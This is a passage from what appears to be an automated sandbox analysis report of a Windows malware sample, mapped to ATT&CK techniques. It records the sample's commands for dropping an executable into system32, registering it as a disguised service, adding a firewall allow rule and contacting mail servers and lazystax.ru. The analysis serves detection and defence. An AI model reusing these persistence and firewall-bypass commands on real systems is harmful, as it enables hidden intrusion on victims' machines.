\"0d000e00b0499372@SHELL32.dll\"\n \"0f00100054709372@ADVAPI32.dll\"\n \"1400150094709372@ADVAPI32.dll\"\n \"14001500ac709372@ADVAPI32.dll\"\n \"0c000d00f4709372@ADVAPI32.dll\"\n \"0c000d0004719372@ADVAPI32.dll\"\n \"0e000f0014719372@ADVAPI32.dll\"\n \"0e000f0024719372@ADVAPI32.dll\"\n \"0b000c0034719372@ADVAPI32.dll\"\n \"1400150068729372@SETUPAPI.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rtmxemaq.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"\n \"rtmxemaq.exe\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00006024)\n \"sc.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00005872)\n \"sc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00005872)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005872)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005872)\n \"sc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005872)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005872)\n \"sc.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00004284)\n \"sc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00004284)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004284)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004284)\n \"sc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004284)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004284)\n \"rtmxemaq.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00003744)\n \"rtmxemaq.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00003744)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHWFP.DLL (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DHCPCMONITOR.DLL (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpcsvc.dll (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpqec.dll (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WSHELPER.DLL (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHHTTP.DLL (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter FWCFG.DLL (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter AUTHFWCFG.DLL (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter IFMON.DLL (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETIOHLP.DLL (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WHHELPER.DLL (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HNETMON.DLL (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter RPCNSH.DLL (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DOT3CFG.DLL (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NAPMONTR.DLL (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHIPSEC.DLL (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETTRACE.DLL (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WCNNETSH.DLL (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter P2PNETSH.DLL (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WLANCFG.DLL (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WWANCFG.DLL (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter PEERDISTSH.DLL (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L2-1-0.dll (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HTTPAPI.dll (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter userenv.dll (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002212)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00002212)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00003660)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter Iphlpapi.dll (UID: 00000000-00003660)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00003660)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00003660)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00003660)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00003660)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00006024)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C mkdir %WINDIR%\\system32\\xtblsmos\\\" - (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C move /Y \"%TEMP%\\rtmxemaq.exe\" %WINDIR%\\system32\\xtblsmos\\\" - (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" create xtblsmos binPath= \"%WINDIR%\\system32\\xtblsmos\\rtmxemaq.exe /d\\\"C:\\952c4806fdc7dda64c80fcc729\" - (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" description xtblsmos \"wifi internet conection\"\" - (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" start xtblsmos\" - (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\netsh.exe\" advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow prog\" - (UID: 00000000-00006024)\n \"rtmxemaq.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00003744)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77C60000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77C60000\n \"sc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77C60000\n \"rtmxemaq.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77C60000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77C60000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77C60000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-275", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a named pipe", "description": "\"svchost.exe\" called \"CreateNamedPipeA\" with parameter \"\\\\.\\pipe\\uqyipjlp\"\n dwOpenMode: \"1073741827\"\n dwPipeMode: \"0\" - (UID: 00000000-00003660)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-302", "type": 9, "relevance": 3, "name": "Tries to move files", "description": "Process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\rtmxemaq.exe\" %WINDIR%\\\\system32\\\\xtblsmos\\\\\" (UID: 00000000-00005928)", "origin": "Monitored Target", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"sc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"sc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"netsh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"netsh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:80\"\n \"<IPv4>:25\"\n \"<IPv4>:443\"\n \"<IPv4>:443\"\n \"<IPv4>:25\"\n \"<IPv4>:25\"\n \"<IPv4>:25\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\xtblsmos\\\\\" (UID: 00000000-00006020)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\rtmxemaq.exe\" %WINDIR%\\\\system32\\\\xtblsmos\\\\\" (UID: 00000000-00005928)\n Spawned process \"sc.exe\" with commandline \"create xtblsmos binPath= \"%WINDIR%\\\\system32\\\\xtblsmos\\\\rtmxemaq ...\" (UID: 00000000-00005872), Spawned process \"sc.exe\" with commandline \"description xtblsmos \"wifi internet conection\"\" (UID: 00000000-00004284), Spawned process \"sc.exe\" with commandline \"start xtblsmos\" (UID: 00000000-00002116), Spawned process \"rtmxemaq.exe\" with commandline \"/d\"C:\\\\952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76 ...\" (UID: 00000000-00003744)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00002212), Spawned process \"svchost.exe\" (UID: 00000000-00003660)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"lazystax.ru\"\n \"microsoft-com.mail.protection.outlook.com\"\n \"microsoft.com\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\xtblsmos\\\\\" (UID: 00000000-00006020)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\rtmxemaq.exe\" %WINDIR%\\\\system32\\\\xtblsmos\\\\\" (UID: 00000000-00005928)\n Spawned process \"sc.exe\" with commandline \"create xtblsmos binPath= \"%WINDIR%\\\\system32\\\\xtblsmos\\\\rtmxemaq ...\" (UID: 00000000-00005872), Spawned process \"sc.exe\" with commandline \"description xtblsmos \"wifi internet conection\"\" (UID: 00000000-00004284), Spawned process \"sc.exe\" with commandline \"start xtblsmos\" (UID: 00000000-00002116), Spawned process \"rtmxemaq.exe\" with commandline \"/d\"C:\\\\952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76 ...\" (UID: 00000000-00003744)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00002212), Spawned process \"svchost.exe\" (UID: 00000000-00003660)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"rtmxemaq.exe\" (UID: 00000000-00003744) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP\"\n Process \"rtmxemaq.exe\" (UID: 00000000-00003744) was launched with missing environment variables: \"LOGONSERVER, HOMEPATH, HOMEDRIVE\"\n Process \"netsh.exe\" (UID: 00000000-00002212) was launched with new environment variables: \"LOGONSERVER=\"%HOSTNAME%\", HOMEPATH=\"\\Users\\%OSUSER%\", HOMEDRIVE=\"C:\"\"\n Process \"netsh.exe\" (UID: 00000000-00002212) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP\"\n Process \"svchost.exe\" (UID: 00000000-00003660) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP\"\n Process \"svchost.exe\" (UID: 00000000-00003660) was launched with missing environment variables: \"LOGONSERVER, HOMEPATH, HOMEDRIVE\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4\" has an executable section named \".text\"\n \"rtmxemaq.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4\" has an writable section named \".data\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4\" has an writable section named \".text\"\n \"rtmxemaq.exe\" has an writable section named \".data\"\n \"rtmxemaq.exe\" has an writable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"rtmxemaq.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"rtmxemaq.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"rtmxemaq.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-125", "relevance": 3, "name": "PE file has a big raw size section", "description": "Raw size of \".reloc\" is \"0xdd8000\" greater than 0x100000\n Raw size of \".reloc\" is \"0xc5e000\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"rtmxemaq.exe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4\" was detected as \"VC8 -> Microsoft Corporation\"\n \"rtmxemaq.exe\" was detected as \"VC8 -> Microsoft Corporation\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"rtmxemaq.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\rtmxemaq.exe]- [targetUID: 00000000-00005928]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to access non-existent file \"C:\\dbghelp.dll\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to access non-existent file \"C:\\msvcr100.dll\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n 